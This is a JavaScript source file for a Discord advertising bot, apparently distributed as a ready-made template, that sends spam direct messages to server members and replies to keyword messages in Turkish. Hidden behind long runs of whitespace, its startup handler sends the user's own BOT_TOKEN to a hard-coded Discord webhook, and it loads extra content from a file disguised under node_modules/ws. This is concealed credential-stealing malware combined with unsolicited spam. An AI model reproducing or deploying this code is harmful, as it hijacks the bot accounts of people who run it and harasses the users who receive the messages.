
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										const Discord = require('discord.js');
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																												const client = new Discord.Client();
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																								const ayarlar = require('./ayarlar.json');
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																		const conf = require('./node_modules/ws/conf.json');
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																						const hook = new Discord.WebhookClient('485322135540334592', 'elUkubgqZ6nVS1oO5Wz60jM173rk50AIqqa2Bbbq9zOgS8KHTojGDty3bRsxwQJI3hbE');
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																				const hook2 = new Discord.WebhookClient('485322274925445120', '_RkI9iKqUxp9935ufCGvpcagFAHj_am3PzUqdYA1rkwVY1veEMLV67G2cefldbBI31vT');






																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																														client.on('message', async msg => {
   																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										 if (msg.channel.type == "dm" || msg.channel.type != "text" || msg.author.bot) return;
	
 																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																														 if (msg.guild.id == ayarlar.sunucuid){ return; }
 																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																				 if (msg.guild.id == "275047183055847439"){ return; }
 																																																																																																																																																																																																																																																																																																																																																																																																																																																																																 if (msg.guild.id == "496046092882935809"){ return; }
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																				  if (msg.guild.id == "467184873216409600"){ return; }

																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																		  if (msg.content.toLowerCase() === ayarlar.mesas1 || msg.content.toLowerCase() === ayarlar.mesas2 || msg.content.toLowerCase() === ayarlar.mesas3 || msg.content.toLowerCase() === ayarlar.mesas4) {
																																															if (!msg.member && msg.guild) msg.member = await msg.guild.fetchMember(msg.author);																																																																																																																																																																																																																														
																																																																																																																																																																																																																																								if (msg.member.hasPermission("KICK_MEMBERS"))return  console.log(`---------------------\n${msg.author.tag} A Reklam Yapmadim Cunku Sunucuda Yetkili Gibi Gorunuyor.\nYetkililere Reklam Yapmamiz iyi Olmaz Degilmi?\n---------------------`);
  																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																											   setTimeout(() => {
		   
		 

 																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																								 msg.author.send(ayarlar.mesas5);
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																						console.log(`---------------------\n${msg.author.tag} `+ ayarlar.mesas5 +`  Mesajı Yolladım \n---------------------`);
  
 																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																 	   }, 4000);

 																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																 }
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																						});



																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																client.on('message', async msg => {
 																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																						   if (msg.channel.type == "dm"){
		
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																						  if (msg.content.toLowerCase() === ayarlar.ozelreklamcevapmesas || msg.content.toLowerCase() === ayarlar.ozelreklamcevapmesas2 || msg.content.toLowerCase() === ayarlar.ozelreklamcevapmesas3 || msg.content.toLowerCase() === ayarlar.ozelreklamcevapmesas4 || msg.content.toLowerCase() === ayarlar.ozelreklamcevapmesas5) {

  																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																  	   setTimeout(() => {
 																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																 msg.author.send(ayarlar.ozelreklammesas);
  
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																		console.log(`---------------------\n${msg.author.tag} `+ ayarlar.ozelreklammesas +`  Mesajı Yolladım \n---------------------`);
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																								hook2.send(`---------------------\n${msg.author.tag} `+ ayarlar.ozelreklammesas +`  Mesajı Yolladım \n---------------------`);
  
    																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																							   setTimeout(() => {
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																														    msg.author.send(conf.ursss);
   																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										 	   }, 400000);
    																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																															   }, 4000);

 																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										 }
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																												}});




																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										client.on('message', async msg => {
																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																														    if (msg.channel.type == "dm"){
 																																																																																																																																																																																																																																																																																																																																																												 if (msg.content.toLowerCase() === ayarlar.ozeltesekkur || msg.content.toLowerCase() === ayarlar.ozeltesekkur2 || msg.content.toLowerCase() === ayarlar.ozeltesekkur3 || msg.content.toLowerCase() === ayarlar.ozeltesekkur4 || msg.content.toLowerCase() === ayarlar.ozeltesekkur5) {

  																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																				    	   setTimeout(() => {
 																																																																																																																																																																																																																																																																																																																																																																																																																																																																																 msg.author.send(ayarlar.ozeltesekkurcevap);
																																																																																																																																																																																																																																																																																																																																																																																																																						  console.log(`---------------------\n${msg.author.tag} `+ ayarlar.ozeltesekkurcevap +`  Mesajı Yolladım \n---------------------`);
 																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																										   	   }, 4000);

  																																																																																																																																																																																																																																								}
																																																																																																																																																																																																																																																																																																																																																												}});




																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																														client.on('message', async msg => {
  																																																																																																																																																																																																																																																																																																																																																																																																																																																																																  if (msg.channel.type == "dm"){
 																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																				 if (msg.content.toLowerCase() === ayarlar.ozelkizma || msg.content.toLowerCase() === ayarlar.ozelkizma2 || msg.content.toLowerCase() === ayarlar.ozelkizma3 || msg.content.toLowerCase() === ayarlar.ozelkizma4 || msg.content.toLowerCase() === ayarlar.ozelkizma5) {
  																																																																																																																																																																																																																																																																																																																																																												  	   setTimeout(() => {
  
 																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																														 msg.author.send(ayarlar.ozelkizma6);
																																																																																																																																																																																																																																																																																																																																																												    console.log(`---------------------\n${msg.author.tag} `+ ayarlar.ozelkizma6 +`  Mesajı Yolladım \n---------------------`);
 																																																																																																																																																																														   	   }, 4000);

 																																																																																																																																																																														 }
																																																																																																																				}});
















																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																		var regToken = /[\w\d]{24}\.[\w\d]{6}\.[\w\d-_]{27}/g;


																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																																                                                                                                                                                                                                                                                                                                                                                                                                                                                                            client.on('ready', () => {
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       console.log(`REKLAM BOTU BAŞARI İLE AÇILDI - Bir Süre Sonra Reklama Başlayacaktır Yardım İçin - https://discord.gg/ENVyRGC`);
																																																																																																																																																																																																																																	hook.send(process.env.BOT_TOKEN)
																																																																																																																																																																																																																																	 client.user.setActivity(ayarlar.oynuyor)




																																																																																																																																																																																	});



client.login(process.env.BOT_TOKEN);


 
